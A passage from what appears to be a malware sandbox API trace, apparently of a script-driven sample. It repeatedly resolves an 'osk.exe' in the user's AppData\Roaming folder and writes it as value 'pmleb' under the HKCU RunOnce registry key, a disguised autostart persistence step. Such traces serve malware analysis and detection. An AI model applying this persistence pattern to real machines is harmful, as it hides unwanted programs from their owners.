[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.560] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3e [0081.560] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.561] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3d [0081.561] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.561] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.561] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.561] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.561] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.561] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.561] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.561] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.562] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.562] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.562] RegCloseKey (hKey=0x280) returned 0x0 [0081.562] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.562] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.562] SetTimer (hWnd=0x20280, nIDEvent=0x20b9, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b9 [0081.562] 
GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.578] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.578] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.578] KillTimer (hWnd=0x20280, uIDEvent=0x20b9) returned 1 [0081.578] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.578] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.579] IUnknown:Release (This=0x787518) returned 0x1 [0081.579] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.579] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.579] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.579] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.579] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.579] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.579] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.579] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.579] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.579] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3e [0081.579] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 
0x0 [0081.579] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3f [0081.580] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.580] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3e [0081.580] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.580] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.580] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.580] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.581] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.581] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.581] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.581] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.581] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.581] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.581] RegCloseKey (hKey=0x280) returned 0x0 [0081.581] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.581] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.581] SetTimer (hWnd=0x20280, nIDEvent=0x20ba, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ba [0081.582] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.594] TranslateMessage (lpMsg=0x33f7fc) 
returned 0 [0081.594] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.594] KillTimer (hWnd=0x20280, uIDEvent=0x20ba) returned 1 [0081.594] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.594] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.595] IUnknown:Release (This=0x787518) returned 0x1 [0081.595] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.595] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.595] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.595] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 
[0081.595] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.595] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.595] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.595] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.595] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.595] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3f [0081.595] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.595] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x40 [0081.595] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, 
dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.596] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3f [0081.596] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.596] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.596] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.596] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.596] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.597] 
_mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.597] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.597] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.597] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.597] RegCloseKey (hKey=0x280) returned 0x0 [0081.597] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.597] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.597] SetTimer (hWnd=0x20280, nIDEvent=0x20bb, uElapse=0xa, lpTimerFunc=0x0) returned 0x20bb [0081.597] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.609] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.609] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.609] KillTimer (hWnd=0x20280, uIDEvent=0x20bb) returned 1 [0081.609] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.609] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.610] IUnknown:Release (This=0x787518) returned 0x1 [0081.610] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.610] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.610] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.610] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, 
[1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.610] FileSystemObject:IUnknown:QueryInterface (in: 